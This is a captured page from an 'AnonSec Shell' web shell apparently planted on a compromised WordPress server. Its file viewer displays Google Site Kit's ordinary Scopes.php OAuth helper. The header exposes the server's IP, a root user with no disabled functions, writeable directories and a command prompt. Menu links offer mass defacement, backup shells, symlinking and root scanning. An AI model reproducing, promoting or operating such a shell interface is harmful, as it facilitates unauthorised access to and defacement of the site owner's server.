AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/wp-content/plugins/google-site-kit/includes/Core/Util/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/wp-content/plugins/google-site-kit/includes/Core/Util/Scopes.php
<?php
/**
 * Class Google\Site_Kit\Core\Util\Scopes
 *
 * @package   Google\Site_Kit\Core\Util
 * @copyright 2021 Google LLC
 * @license   https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
 * @link      https://sitekit.withgoogle.com
 */

namespace Google\Site_Kit\Core\Util;

/**
 * Utility class for handling generic OAuth scope functions.
 *
 * @since 1.9.0
 * @access private
 * @ignore
 */
class Scopes {

	/**
	 * Mapping of requested scope to satisfying scopes.
	 *
	 * @since 1.9.0
	 *
	 * @var array
	 */
	protected static $map = array(
		'https://www.googleapis.com/auth/adsense.readonly' => array(
			'https://www.googleapis.com/auth/adsense',
		),
		'https://www.googleapis.com/auth/analytics.readonly' => array(
			'requires_all' => true,
			'https://www.googleapis.com/auth/analytics',
			'https://www.googleapis.com/auth/analytics.edit',
		),
		'https://www.googleapis.com/auth/tagmanager.readonly' => array(
			'https://www.googleapis.com/auth/tagmanager.edit.containers',
		),
		'https://www.googleapis.com/auth/webmasters.readonly' => array(
			'https://www.googleapis.com/auth/webmasters',
		),
	);

	/**
	 * Tests if the given scope is satisfied by the given list of granted scopes.
	 *
	 * @since 1.9.0
	 *
	 * @param string   $scope          OAuth scope to test for.
	 * @param string[] $granted_scopes Available OAuth scopes to test the individual scope against.
	 * @return bool True if the given scope is satisfied, otherwise false.
	 */
	public static function is_satisfied_by( $scope, array $granted_scopes ) {
		if ( in_array( $scope, $granted_scopes, true ) ) {
			return true;
		}

		if ( empty( self::$map[ $scope ] ) ) {
			return false;
		}

		$satisfying_scopes = array_filter( self::$map[ $scope ], 'is_string' );

		if ( ! empty( self::$map[ $scope ]['requires_all'] ) ) {
			// Return true if all satisfying scopes are present, otherwise false.
			return ! array_diff( $satisfying_scopes, $granted_scopes );
		}

		// Return true if any of the scopes are present, otherwise false.
		return (bool) array_intersect( $satisfying_scopes, $granted_scopes );
	}

	/**
	 * Tests if all the given scopes are satisfied by the list of granted scopes.
	 *
	 * @since 1.9.0
	 *
	 * @param string[] $scopes         OAuth scopes to test.
	 * @param string[] $granted_scopes OAuth scopes to test $scopes against.
	 * @return bool True if all given scopes are satisfied, otherwise false.
	 */
	public static function are_satisfied_by( array $scopes, array $granted_scopes ) {
		foreach ( $scopes as $scope ) {
			if ( ! self::is_satisfied_by( $scope, $granted_scopes ) ) {
				return false;
			}
		}

		return true;
	}
}

Anon7 - 2022
AnonSec Team